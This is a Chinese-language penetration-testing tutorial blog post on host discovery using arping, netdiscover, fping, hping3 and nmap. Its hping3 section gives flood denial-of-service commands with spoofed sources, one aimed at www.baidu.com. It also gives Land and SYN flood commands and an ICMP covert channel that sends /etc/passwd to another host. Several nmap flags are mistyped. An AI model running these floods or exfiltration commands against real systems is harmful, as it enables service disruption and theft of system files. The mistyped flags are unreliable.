web渗透—主机发现

信息收集是web渗透,漏洞挖掘的前期工作
信息收集分为主动收集和被动收集
主动收集:通过直接访问,扫描网站,这种将流量流经网站的行为,如nmap扫描端口
被动收集:利用第三方服务对目标进行访问,比如通过搜索引擎搜索,防止被发现

主动收集

二层主动发现

1.arping
arp地址解析协议,根据ip找mac地址
但是需要注意的是arp只能在局域网中解析,不能跨网段解析的
在这里插入图片描述
可以看到4个包被收到了,表示主机存活

当有多块网卡的时候,指定特定的设备来发送请求包
arping -i eth1 -c 1 192.168.131.155

2.netdiscover
netdiscover也是arp二层侦探工具,但是可以一次性侦探一个网段内在线的主机,支持主动及被动侦探

被动扫描,不发送任何内容,只发送嗅探针
netdiscover -p
netdiscover -i eth0 -r 192.168.31.0/24 -p
在这里插入图片描述
主动扫描一个网段
netdiscover -i eth0 -r 192.168.152.0/24
在这里插入图片描述

三层发现

ping
ping -c 3 192.68.131.24

  • -c 后接次数

fping
和ping命令相比,可以ping多个地址,或者一个网段的地址
fping -s -g 192.168.152.130 192.168.152.140 ping一段地址
在这里插入图片描述

fping 50.116.66.139 173.194.35.35 98.139.183.24 ping多个地址

fping -ags 192.168.152.0/24 > test.txt ping一个网段地址

  • -a alive存活
  • -s stat 打印状态
  • -g generate 一个区间段
    在这里插入图片描述

hping3
hping3 命令可以进行简单的dos攻击!!!!

hping3 -c 100000 -d 120 --udp -w 64 -p 80 --flood --rand-source www.baidu.com
hping3 -c 10000 -d 120 --icmp -w 64 -p 80 --flood --rand-source www.baidu.com
hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood -a 192.168.152.31 192.168.152.31
  • -c 接发送请求次数

  • -d 发送数据包大小

  • -S set sync flag 建立sync连接,也就是对方需要和我进行三次握手,以占用资源
    在这里插入图片描述

  • -w 滑动窗口,发送字节大小

  • –flood 尽快发送数据包,不显示回复

  • –rand-source 源地址欺

  • -a 源地址欺骗

  • -I 接指定网口
    *-i 接等待攻击的时间

以 LandAttack 方式测试目标防火墙 (Land Attack 是将发送源地址设置为与目标地址相同,诱使目标机与自己不停地建立连接)
hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10

使用 Hping3 可以很方便构建拒绝服务攻击。比如对目标机发起大量 SYN 连接,伪造源地址为 192.168.10.99,并使用1000微秒的间隔发送各个 SYN 包
hping3 -a 192.168.10.99 -S -i u1000 -I eth0 123.123.23.23 -p 80

Hping3 支持通过 TCP/UDP/ICMP 等包来进行文件传输。相当于借助 TCP/UDP/ICMP 包建立隐秘隧道通讯。实现方式是开启监听端口,对检测到的签名 (签名为用户指定的字符串) 的内容进行相应的解析。

在接收端开启服务:
hping3 192.168.1.159 --listen signature --safe --icmp
监听 ICMP 包中的签名,根据签名解析出文件内容。

在发送端使用签名打包的 ICMP 包发送文件:
hping3 192.168.1.108 --icmp -d 100 --sign signature --file /etc/passwd
将 /etc/passwd 密码文件通过 ICMP 包传给 192.168.1.108 主机。发送包大小为100字节 (-d 100),发送签名为 signature (–sign signature)。


四层发现

nmap
nmap是一个网络探测和安全扫描程序,可获取主机信息,及主机上的服务信息

  • 扫描一个机器的所有进程服务
    namp xxx.xxx.xxx.xxx
    在这里插入图片描述
  • 只扫描1-200端口的服务
    nmap -P 1-200 192.168.152.135
  • 扫描操作系信息
    nmap -o -P 1-5000 xxx.xxx.xxx.xxx
  • 扫描多个地址
    nmap 192.168.152.135 192.168.152.138
  • 扫描一个地址段
    nmap 192.168.152.135-250
  • 查看运用TCP/UDP技术扫描192.168.152.130的情况
    nmap -sT 192.168.152.130
    nmap -sU 192.168.152.130
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值